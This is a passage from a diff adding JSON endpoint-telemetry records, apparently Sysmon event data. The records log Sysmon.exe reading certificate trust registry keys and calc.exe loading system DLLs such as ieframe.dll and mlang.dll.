131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ieframe.dll", + "image_path": "C:\\Windows\\System32\\ieframe.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243080000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "mlang.dll", + "image_path": "C:\\Windows\\System32\\mlang.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 